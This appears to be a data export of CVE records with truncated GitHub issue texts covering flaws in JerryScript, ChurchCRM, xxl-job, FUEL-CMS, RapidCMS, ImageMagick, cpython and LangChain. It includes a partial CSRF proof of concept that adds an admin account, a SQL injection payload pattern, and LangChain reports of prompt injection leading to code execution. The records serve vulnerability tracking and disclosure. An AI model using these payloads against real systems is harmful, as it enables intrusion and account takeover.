"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | https://github.com/langchain-ai/langchain/issues/5872 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"langchain-ai",
"langchain"
] | ### System Info
langchain version: `0.0.194`
os: `ubuntu 20.04`
python: `3.9.13`
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Promp... | Prompt injection which leads to arbitrary code execution in `langchain.chains.PALChain` | https://api.github.com/repos/langchain-ai/langchain/issues/5872/comments | 5 | 2023-06-08T08:45:37Z | 2023-08-29T16:31:34Z | https://github.com/langchain-ai/langchain/issues/5872 | 1,747,393,600 | 5,872 |
CVE-2020-24187 | 2023-08-11T14:15:10.237 | An issue was discovered in ecma-helpers.c in jerryscript version 2.3.0, allows local attackers to cause a denial of service (DoS) (Null Pointer Dereference). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/jerryscript/NULL-dereference-ecma_get_lex_env_type"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:2.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "BCC6C843-EE98-4852-8D03-7FC19D2E821C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | https://github.com/jerryscript-project/jerryscript/issues/4076 | [
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] |
###### JerryScript revision
commit : https://github.com/jerryscript-project/jerryscript/commit/227007eda75d86db1bb32ea380cf9650122d6920
version : v2.3.0
###### Build platform
Ubuntu 16.04.1 LTS (4.15.0-45-generic x86_64)
###### Build steps
```
python tools/build.py --profile=es2015-subset --lto=off -... | Memory corruption in in ecma_get_lex_env_type (jerryscript/jerry-core/ecma/base/ecma-helpers.c:276) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4076/comments | 0 | 2020-07-28T06:48:28Z | 2020-07-31T15:19:06Z | https://github.com/jerryscript-project/jerryscript/issues/4076 | 666,814,219 | 4,076 |
CVE-2020-24221 | 2023-08-11T14:15:10.297 | An issue was discovered in GetByte function in miniupnp ngiflib version 0.4, allows local attackers to cause a denial of service (DoS) via crafted .gif file (infinite loop). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/miniupnp/ngiflib/issues/17"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:miniupnp_project:ngiflib:0.4:*:*:*:*:*:*:*",
"matchCriteriaId": "5BE2BAA9-5D76-4039-A655-3F478ED5D601",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStar... | https://github.com/miniupnp/ngiflib/issues/17 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"miniupnp",
"ngiflib"
] | I used the command line gif2tga --outbase /dev/null path_to_file to run gif2tga and got a timeout.
The program didn't return or repsond.
The system is ubuntu 16.04.6 amd-64, source commit id is: 0245fd44cc5f8b084762cd5baa034239f0e952d9
compiled by gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12)
debug ... | I found a large or infinite loop in ngiflib | https://api.github.com/repos/miniupnp/ngiflib/issues/17/comments | 2 | 2020-08-01T12:34:50Z | 2021-08-11T13:46:57Z | https://github.com/miniupnp/ngiflib/issues/17 | 670,832,884 | 17 |
CVE-2020-24922 | 2023-08-11T14:15:10.627 | Cross Site Request Forgery (CSRF) vulnerability in xxl-job-admin/user/add in xuxueli xxl-job version 2.2.0, allows remote attackers to execute arbitrary code and esclate privileges via crafted .html file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/xuxueli/xxl-job/issues/1921"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:xuxueli:xxl-job:2.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C7AE69F1-6781-47B8-933D-989F4EF5ED19",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/xuxueli/xxl-job/issues/1921 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"xuxueli",
"xxl-job"
] | After the administrator logged in, open the following a page
poc:
one.html---add a admin
```
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChil... | There is a CSRF vulnerability that can add the administrator account | https://api.github.com/repos/xuxueli/xxl-job/issues/1921/comments | 0 | 2020-08-22T04:23:06Z | 2020-08-22T04:23:06Z | https://github.com/xuxueli/xxl-job/issues/1921 | 683,924,702 | 1,921 |
CVE-2020-24950 | 2023-08-11T14:15:10.690 | SQL Injection vulnerability in file Base_module_model.php in Daylight Studio FUEL-CMS version 1.4.9, allows remote attackers to execute arbitrary code via the col parameter to function list_items. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/562"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.9:*:*:*:*:*:*:*",
"matchCriteriaId": "EA87F758-58A0-409A-910F-46A592120B0B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"version... | https://github.com/daylightstudio/FUEL-CMS/issues/562 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | #### Environment
Version: 1.4.9
#### Vulnerability
Parameter Name:col
Parameter Type: GET
Attack Pattern: extractvalue(1,concat(char(126),(select/**/current_user())))
#### Step
step 1
... | Vulnerability - SQL Injection | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/562/comments | 2 | 2020-08-25T01:24:52Z | 2020-09-23T16:44:49Z | https://github.com/daylightstudio/FUEL-CMS/issues/562 | 685,086,783 | 562 |
CVE-2020-28848 | 2023-08-11T14:15:11.170 | CSV Injection vulnerability in ChurchCRM version 4.2.0, allows remote attackers to execute arbitrary code via crafted CSV file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/ChurchCRM/CRM/issues/5465"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:churchcrm:churchcrm:4.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "EDB0F0E9-42D2-41C7-98DB-CA0E67B98DC9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | https://github.com/ChurchCRM/CRM/issues/5465 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"ChurchCRM",
"CRM"
] | **Vulnerability Name:** CSV Injection/ Formula Injection
**Severity:** High
**Description:** CSV Injection (aka Excel Macro Injection or Formula Injection) exists in List Event Types feature in ChurchCRM v4.2.0 via Name field that is mistreated while exporting to a CSV file.
**Impact:** Arbitrary formulas can be inj... | CSV Injection Vulnerability | https://api.github.com/repos/ChurchCRM/CRM/issues/5465/comments | 7 | 2020-10-24T05:01:52Z | 2024-01-08T02:08:20Z | https://github.com/ChurchCRM/CRM/issues/5465 | 728,661,432 | 5,465 |
CVE-2020-28849 | 2023-08-11T14:15:11.237 | Cross Site Scripting (XSS) vulnerability in ChurchCRM version 4.2.1, allows remote attckers to execute arbitrary code and gain sensitive information via crafted payload in Add New Deposit field in View All Deposit module. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/ChurchCRM/CRM/issues/5477"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2B81A55D-F3F1-4217-BAED-3DC4A7F24DF9",
"versionEndExcluding": null,
"versionEndIncluding": "4.2.1",
"versionStartExc... | https://github.com/ChurchCRM/CRM/issues/5477 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"ChurchCRM",
"CRM"
] | **Name:** Stored Cross Site Scripting leading to Remote File Inclusion vulnerability
**Description:** ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit.
Cross Site Scripting (also referred to as XSS) is a vulnerability that allows an attacker... | Cross Site Scripting Vulnerability leading to Remote File Inclusion | https://api.github.com/repos/ChurchCRM/CRM/issues/5477/comments | 5 | 2020-10-29T13:29:35Z | 2024-03-04T02:13:11Z | https://github.com/ChurchCRM/CRM/issues/5477 | 732,315,548 | 5,477 |
CVE-2023-38860 | 2023-08-15T17:15:11.737 | An issue in LangChain v.0.0.231 allows a remote attacker to execute arbitrary code via the prompt parameter. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/hwchase17/langchain/issues/7641"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:langchain:langchain:0.0.231:*:*:*:*:*:*:*",
"matchCriteriaId": "F477D71B-7192-463A-94B4-99EB77D322C5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | https://github.com/hwchase17/langchain/issues/7641 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"hwchase17",
"langchain"
] | ### System Info
LangChain 0.0.231, Windows 10, Python 3.10.11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] O... | RCE vulnerability in CPAL (causal program-aided language) chain | https://api.github.com/repos/langchain-ai/langchain/issues/7641/comments | 1 | 2023-07-13T07:26:31Z | 2023-08-29T18:44:50Z | https://github.com/langchain-ai/langchain/issues/7641 | 1,802,378,837 | 7,641 |
CVE-2023-38898 | 2023-08-15T17:15:12.187 | An issue in Python cpython v.3.7 allows an attacker to obtain sensitive information via the _asyncio._swap_current_task component. NOTE: this is disputed by the vendor because (1) neither 3.7 nor any other release is affected (it is a bug in some 3.12 pre-releases); (2) there are no common scenarios in which an adversa... | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/python/cpython/issues/105987"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:python:python:3.13.0:alpha0:*:*:*:*:*:*",
"matchCriteriaId": "3BA51E41-D221-431F-870F-536AF2867B50",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | https://github.com/python/cpython/issues/105987 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"python",
"cpython"
] | First appeared in a474e04388c2ef6aca75c26cb70a1b6200235feb, where given function was introduced.
Repro:
```python
import _asyncio
class DummyLoop:
pass
class DummyTask:
pass
l = DummyLoop()
_asyncio._swap_current_task(l, DummyTask())
t = _asyncio._swap_current_task(l, None)
```
Output:
```
... | Crash in `_asyncio._swap_current_task` due to improper reference counting | https://api.github.com/repos/python/cpython/issues/105987/comments | 0 | 2023-06-22T14:41:40Z | 2023-06-26T08:24:45Z | https://github.com/python/cpython/issues/105987 | 1,769,831,570 | 105,987 |
CVE-2023-39659 | 2023-08-15T17:15:12.930 | An issue in langchain langchain-ai v.0.0.232 and before allows a remote attacker to execute arbitrary code via a crafted script to the PythonAstREPLTool._run component. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/langchain-ai/langchain/issues/7700"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:langchain:langchain:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BAFE4797-0C2C-4BBF-87A5-8747A3539923",
"versionEndExcluding": null,
"versionEndIncluding": "0.0.232",
"versionStartE... | https://github.com/langchain-ai/langchain/issues/7700 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"langchain-ai",
"langchain"
] | ### System Info
langchain: 0.0.232
os: ubuntu 20.04
python: 3.9.13
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / ... | Prompt injection which leads to arbitrary code execution | https://api.github.com/repos/langchain-ai/langchain/issues/7700/comments | 5 | 2023-07-14T10:11:00Z | 2023-10-27T19:17:54Z | https://github.com/langchain-ai/langchain/issues/7700 | 1,804,604,289 | 7,700 |
CVE-2023-38905 | 2023-08-17T19:15:12.873 | SQL injection vulnerability in Jeecg-boot v.3.5.0 and before allows a local attacker to cause a denial of service via the Benchmark, PG_Sleep, DBMS_Lock.Sleep, Waitfor, DECODE, and DBMS_PIPE.RECEIVE_MESSAGE functions. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gist.github.com/wealeson1/e24fc8575f4e051320d69e9a75080642"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/jeec... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jeecg:jeecg_boot:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7CCC4761-FDE8-4C1D-99BA-74DB3DEB267A",
"versionEndExcluding": null,
"versionEndIncluding": "3.5.0",
"versionStartExclud... | https://github.com/jeecgboot/jeecg-boot/issues/4737 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"jeecgboot",
"jeecg-boot"
] | ##### 版本号:
3.5.0
##### 前端版本:vue3版?还是 vue2版?
vue3版
##### 问题描述:
/sys/duplicate/check 接口SQL注入,checksql可以被绕过。
##### 截图&代码:
延时10秒。
<img width="1165" alt="image" src="https://user-images.githubusercontent.com/46522822/226792979-cf92d1d9-4579-433e-af85-1cb901480015.png">
不延时。
<img width="1173" alt="image" src=... | [CVE-2023-38905] sys/duplicate/check SQL注入 | https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4737/comments | 4 | 2023-03-22T03:23:48Z | 2023-09-04T09:30:59Z | https://github.com/jeecgboot/JeecgBoot/issues/4737 | 1,634,994,366 | 4,737 |
CVE-2023-4446 | 2023-08-21T01:15:10.320 | A vulnerability, which was classified as critical, was found in OpenRapid RapidCMS 1.3.1. This affects an unknown part of the file template/default/category.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vu... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact... | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/OpenRapid/rapidcms/issues/3"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openrapid:rapidcms:1.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D66CF166-4A08-45F5-9577-38D3CE25AFBA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/OpenRapid/rapidcms/issues/3 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"OpenRapid",
"rapidcms"
] | RapidCMS Dev.1.3.1 was discovered to contain SQL injection vulnerability in `template/default/category.php` .
For more details, see:
[RapidCMS-SQLi-1.pdf](https://github.com/OpenRapid/rapidcms/files/12329060/RapidCMS-SQLi-1.pdf)
| SQL injection vulnerability exists in RapidCMS Dev.1.3.1 | https://api.github.com/repos/OpenRapid/rapidcms/issues/3/comments | 0 | 2023-08-13T08:23:15Z | 2023-08-13T08:24:48Z | https://github.com/OpenRapid/rapidcms/issues/3 | 1,848,481,794 | 3 |
CVE-2023-4447 | 2023-08-21T02:15:10.120 | A vulnerability has been found in OpenRapid RapidCMS 1.3.1 and classified as critical. This vulnerability affects unknown code of the file admin/article-chat.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be use... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/OpenRapid/rapidcms/issues/4"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?cti... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openrapid:rapidcms:1.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D66CF166-4A08-45F5-9577-38D3CE25AFBA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/OpenRapid/rapidcms/issues/4 | [
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"OpenRapid",
"rapidcms"
] | RapidCMS Dev.1.3.1 was discovered to contain SQL injection vulnerability in `admin/article-chat.php` .
For more details, see:
[RapidCMS-SQLi-2.pdf](https://github.com/OpenRapid/rapidcms/files/12329065/RapidCMS-SQLi-2.pdf)
| SQL injection vulnerability exists in RapidCMS Dev.1.3.1 | https://api.github.com/repos/OpenRapid/rapidcms/issues/4/comments | 0 | 2023-08-13T08:26:23Z | 2023-08-13T08:26:23Z | https://github.com/OpenRapid/rapidcms/issues/4 | 1,848,482,818 | 4 |
CVE-2023-4448 | 2023-08-21T02:15:10.227 | A vulnerability was found in OpenRapid RapidCMS 1.3.1 and classified as critical. This issue affects some unknown processing of the file admin/run-movepass.php. The manipulation of the argument password/password2 leads to weak password recovery. The attack may be initiated remotely. The exploit has been disclosed to th... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch"
],
"url": "https://github.com/OpenRapid/rapidcms/commit/4dff387283060961c362d50105ff8da8ea40bcbe#diff-fc57d4c69cf5912c6edb5233c6df069a91106ebd481c115faf1ea124478b26d0"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking",
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openrapid:rapidcms:1.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D66CF166-4A08-45F5-9577-38D3CE25AFBA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/OpenRapid/rapidcms/issues/5 | [
"Issue Tracking",
"Patch"
] | github.com | [
"OpenRapid",
"rapidcms"
] | RapidCMS Dev.1.3.1 was discovered to contain Administrator password reset vulnerability in `admin/run-movepass.php`.
For more details, see:
[RapidCMS-PasswordReset.pdf](https://github.com/OpenRapid/rapidcms/files/12329073/RapidCMS-PasswordReset.pdf)
| Administrator password reset vulnerability exists in RapidCMS Dev.1.3.1 | https://api.github.com/repos/OpenRapid/rapidcms/issues/5/comments | 1 | 2023-08-13T08:32:42Z | 2023-08-14T06:42:27Z | https://github.com/OpenRapid/rapidcms/issues/5 | 1,848,485,398 | 5 |
CVE-2023-38961 | 2023-08-21T17:15:47.973 | Buffer Overflwo vulnerability in JerryScript Project jerryscript v.3.0.0 allows a remote attacker to execute arbitrary code via the scanner_is_context_needed component in js-scanner-until.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5092"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | https://github.com/jerryscript-project/jerryscript/issues/5092 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --compile-flag=-m32 --compi... | heap-buffer-overflow in scanner_is_context_needed | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5092/comments | 0 | 2023-06-24T08:32:20Z | 2023-06-24T08:32:20Z | https://github.com/jerryscript-project/jerryscript/issues/5092 | 1,772,536,756 | 5,092 |
CVE-2021-40211 | 2023-08-22T19:16:21.427 | An issue was discovered with ImageMagick 7.1.0-4 via Division by zero in function ReadEnhMetaFile of coders/emf.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/4097"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.1.0-4:*:*:*:*:*:*:*",
"matchCriteriaId": "7C1767C6-89C1-4D1E-93E0-AC04EF098E16",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | https://github.com/ImageMagick/ImageMagick/issues/4097 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### ImageMagick version
7.1.0
### Operating system
All system
### Operating system, version and so on
All system,the latest version
### Description
pBits can be controlled by an attacker,a division-by-zero exception can happen in function ReadEnhMetaFile() of coders/emf.c at line 428,431.
![222]... | Division by zero in ReadEnhMetaFile() of coders/emf.c | https://api.github.com/repos/ImageMagick/ImageMagick/issues/4097/comments | 0 | 2021-08-21T07:53:53Z | 2021-08-21T11:34:44Z | https://github.com/ImageMagick/ImageMagick/issues/4097 | 976,075,255 | 4,097 |
CVE-2022-48541 | 2023-08-22T19:16:31.443 | A memory leak in ImageMagick 7.0.10-45 and 6.9.11-22 allows remote attackers to perform a denial of service via the "identify -help" command. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/2889"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2024/03/msg000... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:6.9.11-22:*:*:*:*:*:*:*",
"matchCriteriaId": "C5EDF13D-9DE8-4890-82CD-E6977434E531",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versio... | https://github.com/ImageMagick/ImageMagick/issues/2889 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to... | Memory leak in identify -help | https://api.github.com/repos/ImageMagick/ImageMagick/issues/2889/comments | 1 | 2020-11-30T15:25:48Z | 2020-11-30T17:44:27Z | https://github.com/ImageMagick/ImageMagick/issues/2889 | 753,571,210 | 2,889 |
CVE-2022-48570 | 2023-08-22T19:16:32.157 | Crypto++ through 8.4 contains a timing side channel in ECDSA signature generation. Function FixedSizeAllocatorWithCleanup could write to memory outside of the allocation if the allocated memory was not 16-byte aligned. NOTE: this issue exists because the CVE-2019-14318 fix was intentionally removed for functionality re... | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/weidai11/cryptopp/issues/992"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/weidai1... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cryptopp:crypto\\+\\+:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BFA9C8B3-FB1A-4E7F-A316-DACCCF660D08",
"versionEndExcluding": null,
"versionEndIncluding": "8.4.0",
"versionStartE... | https://github.com/weidai11/cryptopp/issues/992 | [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"weidai11",
"cryptopp"
] | @dwmcrobb discovered a latent bug in `FixedSizeSecBlock`. It was reported at [GH #988](https://github.com/weidai11/cryptopp/issues/988). In the 988 bug we fixed the pointer problem and cleaned up the class.
Since the `FixedSizeSecBlock` overhaul we started seeing failures on AppVeyor, which tests the Windows gear. F... | AppVeyor failures after fixing FixedSizeSecBlock | https://api.github.com/repos/weidai11/cryptopp/issues/992/comments | 29 | 2020-12-28T11:39:40Z | 2021-03-17T22:01:10Z | https://github.com/weidai11/cryptopp/issues/992 | 775,357,638 | 992 |
CVE-2023-36281 | 2023-08-22T19:16:36.457 | An issue in langchain v.0.0.171 allows a remote attacker to execute arbitrary code via a JSON file to load_prompt. This is related to __subclasses__ or a template. | {
"cvssMetricV2": null,
